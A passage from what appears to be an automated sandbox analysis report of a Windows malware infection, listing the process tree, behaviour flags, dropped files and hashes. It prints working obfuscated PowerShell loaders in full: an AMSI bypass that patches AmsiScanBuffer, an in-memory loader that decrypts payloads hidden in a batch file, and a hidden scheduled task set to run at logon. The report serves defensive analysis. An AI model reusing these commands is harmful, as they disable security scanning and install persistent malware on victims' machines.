har](46)+''+[Char](100)+''+'l'+'l');$fNQaWpWuGeClKNnLO=$SVcqGmjufytRJA.Invoke($Null,@([Object]$mMvgGbv,[Object]('A'+[Char](109)+''+'s'+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'er')));$XVgVKQrqUx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nWusEhMvsRBzqbuvu,$ZLfVfGLNMgrAYWovZKdjgd).Invoke($fNQaWpWuGeClKNnLO,[uint32]8,4,[ref]$XVgVKQrqUx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fNQaWpWuGeClKNnLO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nWusEhMvsRBzqbuvu,$ZLfVfGLNMgrAYWovZKdjgd).Invoke($fNQaWpWuGeClKNnLO,[uint32]8,0x20,[ref]$XVgVKQrqUx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FHruHigOlgxe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BfVPxLknYdCZXy,[Parameter(Position=1)][Type]$mTWCmWJbAb)$DpLWphIRgJu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+'Pub'+[Char](108)+'ic'+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+'o'+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DpLWphIRgJu.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+'N'+'a'+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+''+[Char](98)+''+[Char](108)+'ic',[Reflection.CallingConventions]::Standard,$BfVPxLknYdCZXy).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');$DpLWphIRgJu.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+',H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'ySi'+[Char](103)+',N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rtu'+'a'+'l',$mTWCmWJbAb,$BfVPxLknYdCZXy).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+'d');Write-Output $DpLWphIRgJu.CreateType();}$gguxYfouFUIZA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+'e'+[Char](109)+''+'.'+''+'d'+'ll')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n'+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+'a'+'t'+''+'i'+''+[Char](118)+''+'e'+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'ds');$NIfCQCPgnJIWEu=$gguxYfouFUIZA.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+'cA'+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](116)+''+'a'+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HdBNpmiUIToNiLmqwrI=FHruHigOlgxe @([String])([IntPtr]);$FgvMyaEpPfVFLVDDlgpbDO=FHruHigOlgxe @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cbANXBmCPUK=$gguxYfouFUIZA.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+[Char](111)+'d'+'u'+'l'+[Char](101)+'Ha'+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+'e'+''+[Char](108)+''+'3'+''+'2'+'.d'+[Char](108)+''+'l'+'')));$lusCXZmZdFgLxT=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$cbANXBmCPUK,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+'Li'+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$bojbCmYSPWlgcnBjb=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$cbANXBmCPUK,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+'t')));$QFFxANT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lusCXZmZdFgLxT,$HdBNpmiUIToNiLmqwrI).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+''+'d'+''+[Char](108)+''+'l'+'');$dhPoytLIniJINIhYF=$NIfCQCPgnJIWEu.Invoke($Null,@([Object]$QFFxANT,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+'f'+''+[Char](102)+'e'+[Char](114)+'')));$zODodlykBT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bojbCmYSPWlgcnBjb,$FgvMyaEpPfVFLVDDlgpbDO).Invoke($dhPoytLIniJINIhYF,[uint32]8,4,[ref]$zODodlykBT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dhPoytLIniJINIhYF,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bojbCmYSPWlgcnBjb,$FgvMyaEpPfVFLVDDlgpbDO).Invoke($dhPoytLIniJINIhYF,[uint32]8,0x20,[ref]$zODodlykBT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+'7'+'7'+''+'s'+''+'t'+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Fix.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Fix.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_937_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_937.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_937.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_937.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('V4Hy8emI3mM56PZmDPionZmQDoSVLTkUh0buDVVDWdM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S+QbBB6/ak2YmQDkQn0LyA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $uBtlQ=New-Object System.IO.MemoryStream(,$param_var); $FyNRj=New-Object System.IO.MemoryStream; $GWKHD=New-Object System.IO.Compression.GZipStream($uBtlQ, [IO.Compression.CompressionMode]::Decompress); $GWKHD.CopyTo($FyNRj); $GWKHD.Dispose(); $uBtlQ.Dispose(); $FyNRj.Dispose(); $FyNRj.ToArray();}function execute_function($param_var,$param2_var){ $pANIv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mSXDz=$pANIv.EntryPoint; $mSXDz.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_937.bat';$eOdAN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_937.bat').Split([Environment]::NewLine);foreach ($lhvkI in $eOdAN) { if ($lhvkI.StartsWith(':: ')) { $JmDDg=$lhvkI.Substring(3); break; }}$payloads_var=[string[]]$JmDDg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.bat" "7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD55dc9a9599fb11ee70f9164d8fea15abf
SHA185faf41a206f3fa8b469609333558cf817df2cda
SHA2563f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD51671cda496fb05c15e99fbc7cce9c117
SHA1009e18567d5cba84b0274969556525a4423e74b2
SHA2562ab5c4448716de8b7649fb7961536c5aa0a2c89105ecef9a413dc060644dfa59
SHA512c71053fdd3cd73905cf7b8ae9b2fd24ef8832afee770b162d55244eaef2da98d3c8a76630b961e6d83ec4d0b737a7fa16c094077571e1775b8386a97ee2b6501
-
C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.batFilesize
276B
MD5caa3a2ed2f93963692d29b4924b107af
SHA18248bb3ed5e11295303987f0a9dc9bff059d65df
SHA2565d6cecdb92dec3252e9237e253448b064f4e1a20b143be8f5dc2a33ca1eea0db
SHA512446dceff78ddb792aec5239cc7bf9d4de3afe6874eb550f4e3c541d254d1007376e38e2879b14110dc295d811dea1de96e14bc74057cf74c0e0544a8b606d26e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0w35wpu.wg5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD50e56f16dad794e44f6100ab42ebf6767
SHA1f8429757596b51ffafac9d842be2a9d4036683c1
SHA2566ca8c2677cf64ea367acc10e9ac608bfc8e232d8a7629fec17b5b44b2427d554
SHA51219931730dc94978e4c27f1886836b2e50fea265209e6d8dda5a39d0c345ae72a9c9c71756ea17dcd1e8e8d89985b3db475cd3a6e87642c62eeb9ff44eeed2a57
-
C:\Users\Admin\AppData\Roaming\startup_str_937.batFilesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_937.vbsFilesize
115B
MD531ac93556d45bd5c7cda7de15c644174
SHA19c244354242c78b753d64c22bfb2ad5a8085ddc9
SHA256642d1de104dad1181474117b26e8b04dccd3726e217bcfeeba3ec1995485aae1
SHA51281a40b94453357af856ad29253ba61b6df35ee5b798f2a2ee8fc15ca11eff67de208b51cdc740e62b81c451ec8041602d6a53c50df911dd0c82640d6428283e4
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
302B
MD5583512c128046c1731f9e43f1f8d99c6
SHA15e1de015d4ecda4860d83e0ab74c813bee4091c9
SHA2564d93e3f7239a3cf3191420807731ed3f8482ccea1b1f0b960ce152a84b17ef98
SHA5123ea0cdc6d55519bcc612c108ab6fc7bd88b75c2da41e4566869ecee5f6845f661341be19fbb66c8d81d1f99282e2fd5cb9dfdc487512a9ead26ca990aa54b368
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD52176fe5eac80179554ec74b8ae6ad885
SHA16a5ecaffbfc964d569b331f5c932f6e9c25984c0
SHA256b075c4dc0f8f094ae23de699893f912bbbee9597a1abe973997c146194bcee86
SHA512ed684a023f18f7277b428e39d3d96ad7e4f427a28f627d741fa3be60828a9b9b57200606ae807bc425bcdde2fa54a8f96d1ef1347d2b631f303964ae28d60c54
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
memory/548-153-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/548-146-0x0000013449200000-0x000001344922B000-memory.dmpFilesize
172KB
-
memory/548-152-0x0000013449200000-0x000001344922B000-memory.dmpFilesize
172KB
-
memory/648-118-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/648-117-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-111-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-110-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-109-0x00000205D4B10000-0x00000205D4B35000-memory.dmpFilesize
148KB
-
memory/704-122-0x0000019E76FD0000-0x0000019E76FFB000-memory.dmpFilesize
172KB
-
memory/704-129-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/704-128-0x0000019E76FD0000-0x0000019E76FFB000-memory.dmpFilesize
172KB
-
memory/772-157-0x0000026473690000-0x00000264736BB000-memory.dmpFilesize
172KB
-
memory/996-141-0x000001C8B5340000-0x000001C8B536B000-memory.dmpFilesize
172KB
-
memory/996-142-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/996-135-0x000001C8B5340000-0x000001C8B536B000-memory.dmpFilesize
172KB
-
memory/1264-35-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-52-0x0000000007440000-0x00000000074D6000-memory.dmpFilesize
600KB
-
memory/1264-53-0x00000000073D0000-0x00000000073E1000-memory.dmpFilesize
68KB
-
memory/1264-54-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-57-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-51-0x0000000007230000-0x000000000723A000-memory.dmpFilesize
40KB
-
memory/1264-50-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-49-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
